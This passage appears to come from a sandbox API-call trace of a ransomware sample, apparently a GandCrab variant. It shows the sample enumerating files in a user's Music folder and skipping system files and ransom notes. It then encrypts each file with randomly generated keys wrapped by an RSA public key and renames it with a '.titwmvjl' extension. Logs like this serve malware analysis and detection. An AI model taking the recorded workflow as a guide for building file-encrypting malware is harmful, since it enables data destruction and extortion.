lpNumberOfBytesWritten=0x259f274, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f274*=0x2162, lpOverlapped=0x0) returned 1 [0092.772] CloseHandle (hObject=0x2ac) returned 1 [0092.772] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.772] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.772] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x26, wMilliseconds=0x53)) [0092.772] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.773] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0092.773] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0092.773] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\d2ca4a09d2ca4deb61a.lock") returned 66 [0092.773] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\ssxpzkkuqdeph\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2ac [0092.773] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.773] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.774] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\") returned 42 [0092.774] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\*" [0092.774] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\*", fInfoLevelId=0x1, lpFindFileData=0x259f290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f290) returned 0x5031f8 [0092.774] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.774] FindNextFileW (in: hFindFile=0x5031f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0092.775] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.775] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.775] FindNextFileW (in: hFindFile=0x5031f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0092.775] lstrcmpW (lpString1="5Svb7CtHnlv9cG.wav", lpString2=".") returned 1 [0092.775] lstrcmpW (lpString1="5Svb7CtHnlv9cG.wav", lpString2="..") returned 1 [0092.775] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\", lpString2="5Svb7CtHnlv9cG.wav" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\5Svb7CtHnlv9cG.wav") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\5Svb7CtHnlv9cG.wav" [0092.775] lstrlenW (lpString=".titwmvjl") returned 9 [0092.775] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\5Svb7CtHnlv9cG.wav") returned 60 [0092.775] VirtualAlloc (lpAddress=0x0, dwSize=0xb8, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.775] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\5Svb7CtHnlv9cG.wav.titwmvjl") returned 69 [0092.775] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\5Svb7CtHnlv9cG.wav") returned 60 [0092.775] lstrlenW (lpString=".wav") returned 4 [0092.775] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.775] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".wav ") returned 5 [0092.775] lstrcmpiW (lpString1=".wav", lpString2=".titwmvjl") returned 1 [0092.775] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.776] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\5Svb7CtHnlv9cG.wav") returned 60 [0092.776] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\5Svb7CtHnlv9cG.wav") returned 60 [0092.776] lstrcmpiW (lpString1="5Svb7CtHnlv9cG.wav", lpString2="desktop.ini") returned -1 [0092.776] lstrcmpiW (lpString1="5Svb7CtHnlv9cG.wav", lpString2="autorun.inf") returned -1 [0092.776] lstrcmpiW (lpString1="5Svb7CtHnlv9cG.wav", lpString2="ntuser.dat") returned -1 [0092.776] lstrcmpiW (lpString1="5Svb7CtHnlv9cG.wav", lpString2="iconcache.db") returned -1 [0092.776] lstrcmpiW (lpString1="5Svb7CtHnlv9cG.wav", lpString2="bootsect.bak") returned -1 [0092.776] lstrcmpiW (lpString1="5Svb7CtHnlv9cG.wav", lpString2="boot.ini") returned -1 [0092.776] lstrcmpiW (lpString1="5Svb7CtHnlv9cG.wav", lpString2="ntuser.dat.log") returned -1 [0092.776] lstrcmpiW (lpString1="5Svb7CtHnlv9cG.wav", lpString2="thumbs.db") returned -1 [0092.776] lstrcmpiW (lpString1="5Svb7CtHnlv9cG.wav", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0092.776] lstrcmpiW (lpString1="5Svb7CtHnlv9cG.wav", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0092.776] lstrcmpiW (lpString1="5Svb7CtHnlv9cG.wav", lpString2="KRAB-DECRYPT.html") returned -1 [0092.776] lstrcmpiW (lpString1="5Svb7CtHnlv9cG.wav", lpString2="CRAB-DECRYPT.html") returned -1 [0092.776] lstrcmpiW (lpString1="5Svb7CtHnlv9cG.wav", lpString2="KRAB-DECRYPT.txt") returned -1 [0092.776] lstrcmpiW (lpString1="5Svb7CtHnlv9cG.wav", lpString2="CRAB-DECRYPT.txt") returned -1 [0092.776] lstrcmpiW (lpString1="5Svb7CtHnlv9cG.wav", lpString2="ntldr") returned -1 [0092.776] lstrcmpiW (lpString1="5Svb7CtHnlv9cG.wav", lpString2="NTDETECT.COM") returned -1 [0092.776] lstrcmpiW (lpString1="5Svb7CtHnlv9cG.wav", lpString2="Bootfont.bin") returned -1 [0092.776] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\5Svb7CtHnlv9cG.wav") returned 60 [0092.776] lstrlenW (lpString=".wav") returned 4 [0092.776] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.776] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".wav ") returned 5 [0092.776] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.776] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.777] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\5Svb7CtHnlv9cG.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\ssxpzkkuqdeph\\5svb7cthnlv9cg.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0092.777] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.777] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0092.778] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.778] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.778] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0092.778] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0092.779] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0092.779] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0092.779] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0092.779] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.779] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.779] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.779] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.779] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0092.780] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0092.780] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0092.780] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0092.780] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0092.780] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.780] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.780] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.780] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.780] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0092.781] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.781] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5034f8) returned 1 [0092.781] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.781] CryptGetKeyParam (in: hKey=0x5034f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0092.781] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.781] CryptEncrypt (in: hKey=0x5034f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0092.781] GetLastError () returned 0x0 [0092.781] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.782] CryptDestroyKey (hKey=0x5034f8) returned 1 [0092.782] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.782] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.782] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.782] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0092.782] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.782] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5033f8) returned 1 [0092.783] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.783] CryptGetKeyParam (in: hKey=0x5033f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0092.783] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.783] CryptEncrypt (in: hKey=0x5033f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0092.783] GetLastError () returned 0x0 [0092.783] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.783] CryptDestroyKey (hKey=0x5033f8) returned 1 [0092.783] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.783] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.783] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0092.784] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0092.784] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0x53ba, lpOverlapped=0x0) returned 1 [0092.795] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffffac46, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.795] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x53ba, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0x53ba, lpOverlapped=0x0) returned 1 [0092.796] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.796] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0092.798] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.801] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.801] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.801] CloseHandle (hObject=0x2b4) returned 1 [0092.803] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\5Svb7CtHnlv9cG.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\ssxpzkkuqdeph\\5svb7cthnlv9cg.wav"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\5Svb7CtHnlv9cG.wav.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\ssxpzkkuqdeph\\5svb7cthnlv9cg.wav.titwmvjl"), dwFlags=0x1) returned 1 [0092.804] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.804] FindNextFileW (in: hFindFile=0x5031f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0092.804] lstrcmpW (lpString1="9PsjFY-F PSzjx.mp3", lpString2=".") returned 1 [0092.804] lstrcmpW (lpString1="9PsjFY-F PSzjx.mp3", lpString2="..") returned 1 [0092.804] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\", lpString2="9PsjFY-F PSzjx.mp3" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\9PsjFY-F PSzjx.mp3") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\9PsjFY-F PSzjx.mp3" [0092.804] lstrlenW (lpString=".titwmvjl") returned 9 [0092.804] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\9PsjFY-F PSzjx.mp3") returned 60 [0092.804] VirtualAlloc (lpAddress=0x0, dwSize=0xb8, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.804] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\9PsjFY-F PSzjx.mp3.titwmvjl") returned 69 [0092.804] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\9PsjFY-F PSzjx.mp3") returned 60 [0092.805] lstrlenW (lpString=".mp3") returned 4 [0092.805] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.805] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".mp3 ") returned 5 [0092.805] lstrcmpiW (lpString1=".mp3", lpString2=".titwmvjl") returned -1 [0092.805] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.805] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\9PsjFY-F PSzjx.mp3") returned 60 [0092.805] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\9PsjFY-F PSzjx.mp3") returned 60 [0092.805] lstrcmpiW (lpString1="9PsjFY-F PSzjx.mp3", lpString2="desktop.ini") returned -1 [0092.805] lstrcmpiW (lpString1="9PsjFY-F PSzjx.mp3", lpString2="autorun.inf") returned -1 [0092.805] lstrcmpiW (lpString1="9PsjFY-F PSzjx.mp3", lpString2="ntuser.dat") returned -1 [0092.805] lstrcmpiW (lpString1="9PsjFY-F PSzjx.mp3", lpString2="iconcache.db") returned -1 [0092.805] lstrcmpiW (lpString1="9PsjFY-F PSzjx.mp3", lpString2="bootsect.bak") returned -1 [0092.805] lstrcmpiW (lpString1="9PsjFY-F PSzjx.mp3", lpString2="boot.ini") returned -1 [0092.805] lstrcmpiW (lpString1="9PsjFY-F PSzjx.mp3", lpString2="ntuser.dat.log") returned -1 [0092.805] lstrcmpiW (lpString1="9PsjFY-F PSzjx.mp3", lpString2="thumbs.db") returned -1 [0092.805] lstrcmpiW (lpString1="9PsjFY-F PSzjx.mp3", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0092.805] lstrcmpiW (lpString1="9PsjFY-F PSzjx.mp3", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0092.805] lstrcmpiW (lpString1="9PsjFY-F PSzjx.mp3", lpString2="KRAB-DECRYPT.html") returned -1 [0092.805] lstrcmpiW (lpString1="9PsjFY-F PSzjx.mp3", lpString2="CRAB-DECRYPT.html") returned -1 [0092.805] lstrcmpiW (lpString1="9PsjFY-F PSzjx.mp3", lpString2="KRAB-DECRYPT.txt") returned -1 [0092.805] lstrcmpiW (lpString1="9PsjFY-F PSzjx.mp3", lpString2="CRAB-DECRYPT.txt") returned -1 [0092.805] lstrcmpiW (lpString1="9PsjFY-F PSzjx.mp3", lpString2="ntldr") returned -1 [0092.805] lstrcmpiW (lpString1="9PsjFY-F PSzjx.mp3", lpString2="NTDETECT.COM") returned -1 [0092.805] lstrcmpiW (lpString1="9PsjFY-F PSzjx.mp3", lpString2="Bootfont.bin") returned -1 [0092.805] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\9PsjFY-F PSzjx.mp3") returned 60 [0092.805] lstrlenW (lpString=".mp3") returned 4 [0092.805] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.806] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".mp3 ") returned 5 [0092.806] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.806] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.806] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\9PsjFY-F PSzjx.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\ssxpzkkuqdeph\\9psjfy-f pszjx.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0092.806] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.806] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0092.807] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.807] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.807] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0092.808] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0092.808] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0092.808] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0092.808] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0092.808] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.808] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.808] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.809] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.809] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0092.809] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0092.809] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0092.810] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0092.810] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0092.810] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.810] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.810] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.810] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.810] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0092.810] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.811] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503278) returned 1 [0092.811] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.811] CryptGetKeyParam (in: hKey=0x503278, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0092.811] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.811] CryptEncrypt (in: hKey=0x503278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0092.811] GetLastError () returned 0x0 [0092.811] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.812] CryptDestroyKey (hKey=0x503278) returned 1 [0092.812] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.812] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.812] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.812] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0092.812] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.812] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503378) returned 1 [0092.813] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.813] CryptGetKeyParam (in: hKey=0x503378, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0092.813] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.813] CryptEncrypt (in: hKey=0x503378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0092.813] GetLastError () returned 0x0 [0092.813] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.813] CryptDestroyKey (hKey=0x503378) returned 1 [0092.813] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.813] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.813] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0092.814] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0092.814] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0x11d68, lpOverlapped=0x0) returned 1 [0092.825] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffee298, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.826] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x11d68, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0x11d68, lpOverlapped=0x0) returned 1 [0092.827] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, 